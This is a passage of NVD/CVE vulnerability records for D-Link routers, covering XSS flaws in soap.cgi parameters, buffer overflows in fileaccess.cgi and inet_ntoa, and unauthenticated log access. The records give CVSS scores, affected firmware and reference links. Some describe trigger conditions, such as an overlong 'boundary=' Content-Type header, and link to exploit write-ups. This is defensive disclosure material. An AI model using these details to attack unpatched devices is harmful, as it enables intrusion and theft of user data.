"url": "https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-16190",
"datePublished": "2019-09-09T19:54:36",
"dateReserved": "2019-09-09T00:00:00",
"dateUpdated": "2024-08-05T01:10:41.518Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Vulnerability from fkie_nvd
Published
2018-03-06 20:29
Modified
2024-11-21 04:10
Severity ?
Summary
XSS vulnerability in htdocs/webinc/js/bsc_sms_inbox.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted Treturn parameter to soap.cgi.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-860l_firmware | * | |
| dlink | dir-860l | - | |
| dlink | dir-865l_firmware | * | |
| dlink | dir-865l | - | |
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3887A644-753A-4CA3-9D79-0718057EEB3B",
"versionEndIncluding": "a1_fw110b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-860l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CCDB9720-8F5A-4F02-A436-920CDAC15D69",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-865l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0624940E-9466-40BA-97E4-648537A092C0",
"versionEndIncluding": "reva_firmware_patch_1.08.b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-865l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3A853DF-6DF1-4E8E-8D55-95279EE0CB30",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE2D4824-B834-41EA-8F70-AF12720030C9",
"versionEndIncluding": "a1_fw112b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XSS vulnerability in htdocs/webinc/js/bsc_sms_inbox.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted Treturn parameter to soap.cgi."
},
{
"lang": "es",
"value": "Vulnerabilidad de Cross-Site Scripting (XSS) en htdocs/webinc/js/bsc_sms_inbox.php en D-Link DIR-868L DIR868LA1_FW112b04 y versiones anteriores; DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 y versiones anteriores y DIR-860L DIR860LA1_FW110b04 y versiones anteriores permite que atacantes remotos lean una cookie mediante un par\u00e1metro Treturn manipulado en soap.cgi."
}
],
"id": "CVE-2018-6529",
"lastModified": "2024-11-21T04:10:50.547",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-03-06T20:29:00.907",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-10-14 18:15
Modified
2024-11-21 03:13
Severity ?
Summary
Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileacces.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with ''boundary=' followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://github.com/badnack/d_link_880_bug/blob/master/README.md | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/badnack/d_link_880_bug/blob/master/README.md | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-868l_firmware | - | |
| dlink | dir-868l | - | |
| dlink | dir-890l_firmware | - | |
| dlink | dir-890l | - | |
| dlink | dir-885l_firmware | - | |
| dlink | dir-885l | - | |
| dlink | dir-895l_firmware | 1.13b03 | |
| dlink | dir-895l | - | |
| dlink | dir-880l_firmware | 1.08b04 | |
| dlink | dir-880l | - | |
| dlink | dir-895r_firmware | 1.13b03 | |
| dlink | dir-895r | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "26512943-D705-484D-B9EA-BF401606DFA3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-890l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0BCCA2BB-4577-402C-88B5-F8E10770CA35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-890l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B1EA89C7-4655-43A3-9D2B-D57640D56C09",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-885l_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3441E49F-C21B-4B68-89AD-BD46E8D88638",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-885l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AD481B64-A25D-4123-B575-20EC3C524D9C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-895l_firmware:1.13b03:*:*:*:*:*:*:*",
"matchCriteriaId": "8AC402D8-0279-49B0-BB77-23B036A400C9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-895l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0B9EBC5D-43DE-4B26-8272-5A9AD2ECE2E2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-880l_firmware:1.08b04:*:*:*:*:*:*:*",
"matchCriteriaId": "75AEBC09-E4B8-46D6-BD72-5AB4522B732A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC772491-6371-4712-B358-E74D9C5062FD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-895r_firmware:1.13b03:*:*:*:*:*:*:*",
"matchCriteriaId": "65C3BB4D-EEBE-4B06-9C4D-6181D66CB905",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-895r:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DF2DADDD-2F1C-458D-B3F5-07EE0FE35E92",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileacces.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with \u0027\u0027boundary=\u0027 followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution."
},
{
"lang": "es",
"value": "Ciertos productos de D-Link se ven afectados por: Desbordamiento de b\u00fafer. Esto afecta a DIR-880L 1.08B04 y DIR-895 L/R 1.13b03. El impacto es: ejecutar c\u00f3digo arbitrario (remoto). El componente es: htdocs/fileaccess.cgi. El vector de ataque es: una petici\u00f3n HTTP dise\u00f1ada manejada por fileacces.cgi podr\u00eda permitir que un atacante realice un ataque ROP: si el campo de encabezado HTTP CONTENT_TYPE comienza con \u0027\u0027boundary=\u0027\u0027 seguido de m\u00e1s de 256 caracteres, se desencadenar\u00e1 un desbordamiento de b\u00fafer, potencialmente causando la ejecuci\u00f3n del c\u00f3digo."
}
],
"id": "CVE-2017-14948",
"lastModified": "2024-11-21T03:13:49.407",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-10-14T18:15:10.263",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/badnack/d_link_880_bug/blob/master/README.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/badnack/d_link_880_bug/blob/master/README.md"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-08-18 03:15
Modified
2024-11-21 08:15
Severity ?
Summary
D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the inet_ntoa() function.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-868l_firmware | 1.12_eu_multi_20170316 | |
| dlink | dir-868l | a |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:1.12_eu_multi_20170316:*:*:*:*:*:*:*",
"matchCriteriaId": "0A83B951-9E4E-4CF8-BFDB-14C167F02F09",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:a:*:*:*:*:*:*:*",
"matchCriteriaId": "8DA57BC8-C8EE-49E3-A592-C68CC2AAA8E4",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [
{
"sourceIdentifier": "cve@mitre.org",
"tags": [
"unsupported-when-assigned"
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the inet_ntoa() function."
},
{
"lang": "es",
"value": "Se descubri\u00f3 que D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 contiene un desbordamiento de b\u00fafer a trav\u00e9s del par\u00e1metro param_2 en la funci\u00f3n inet_ntoa()."
}
],
"id": "CVE-2023-39668",
"lastModified": "2024-11-21T08:15:47.870",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-08-18T03:15:22.103",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L%20Buffer%20overflow%202.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://support.dlink.com/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L%20Buffer%20overflow%202.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://support.dlink.com/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://www.dlink.com/en/security-bulletin/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-03-06 20:29
Modified
2024-11-21 04:10
Severity ?
Summary
XSS vulnerability in htdocs/webinc/js/adv_parent_ctrl_map.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted deviceid parameter to soap.cgi.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-860l_firmware | * | |
| dlink | dir-860l | - | |
| dlink | dir-865l_firmware | * | |
| dlink | dir-865l | - | |
| dlink | dir-868l_firmware | * | |
| dlink | dir-868l | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3887A644-753A-4CA3-9D79-0718057EEB3B",
"versionEndIncluding": "a1_fw110b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-860l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CCDB9720-8F5A-4F02-A436-920CDAC15D69",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-865l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0624940E-9466-40BA-97E4-648537A092C0",
"versionEndIncluding": "reva_firmware_patch_1.08.b01",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-865l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3A853DF-6DF1-4E8E-8D55-95279EE0CB30",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE2D4824-B834-41EA-8F70-AF12720030C9",
"versionEndIncluding": "a1_fw112b04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
"matchCriteriaId": "33B501D4-BDDD-485E-A5A3-8AA8D5E46061",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XSS vulnerability in htdocs/webinc/js/adv_parent_ctrl_map.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted deviceid parameter to soap.cgi."
},
{
"lang": "es",
"value": "Vulnerabilidad de Cross-Site Scripting (XSS) en htdocs/webinc/js/adv_parent_ctrl_map.php en D-Link DIR-868L DIR868LA1_FW112b04 y versiones anteriores; DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 y versiones anteriores y DIR-860L DIR860LA1_FW110b04 y versiones anteriores permite que atacantes remotos lean una cookie mediante un par\u00e1metro deviceid manipulado en soap.cgi."
}
],
"id": "CVE-2018-6527",
"lastModified": "2024-11-21T04:10:50.220",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-03-06T20:29:00.780",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-03-25 22:29
Modified
2024-11-21 04:48
Severity ?
Summary
D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users' DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10).
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://github.com/xw77cve/CVE-2019-7642/blob/master/README.md | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/xw77cve/CVE-2019-7642/blob/master/README.md | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-817lw_firmware | 1.04 | |
| dlink | dir-817lw | a1 | |
| dlink | dir-816l_firmware | 2.06 | |
| dlink | dir-816l | b1 | |
| dlink | dir-816_firmware | 2.06 | |
| dlink | dir-816 | b1 | |
| dlink | dir-850l_firmware | 1.09 | |
| dlink | dir-850l | a1 | |
| dlink | dir-868l_firmware | 1.10 | |
| dlink | dir-868l | a1 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-817lw_firmware:1.04:*:*:*:*:*:*:*",
"matchCriteriaId": "8860070A-8B05-46B9-A8CD-AD2DA9B543FD",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-817lw:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "6DADD4BA-C614-40C1-BEA4-76DDA87FBAB3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:*",
"matchCriteriaId": "1817EE29-D782-4A98-A478-20BDA559C5CE",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-816l:b1:*:*:*:*:*:*:*",
"matchCriteriaId": "637B2D4B-0EA7-4E30-9B2B-77484D701042",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-816_firmware:2.06:*:*:*:*:*:*:*",
"matchCriteriaId": "5F74DFB0-3630-416A-8C15-73181EFA4DE9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-816:b1:*:*:*:*:*:*:*",
"matchCriteriaId": "9348DEC5-2136-4979-859E-72D01C9840CE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-850l_firmware:1.09:*:*:*:*:*:*:*",
"matchCriteriaId": "F270BF5D-19E8-499C-A089-6E17DEC2E7E9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-850l:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "E293D83B-F8D8-46DC-84B6-EF08F773BEC0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-868l_firmware:1.10:*:*:*:*:*:*:*",
"matchCriteriaId": "62D91030-F965-427A-A51B-BC0A3AB78368",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-868l:a1:*:*:*:*:*:*:*",
"matchCriteriaId": "0D8A8303-F830-477F-8944-F1149A0CD521",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
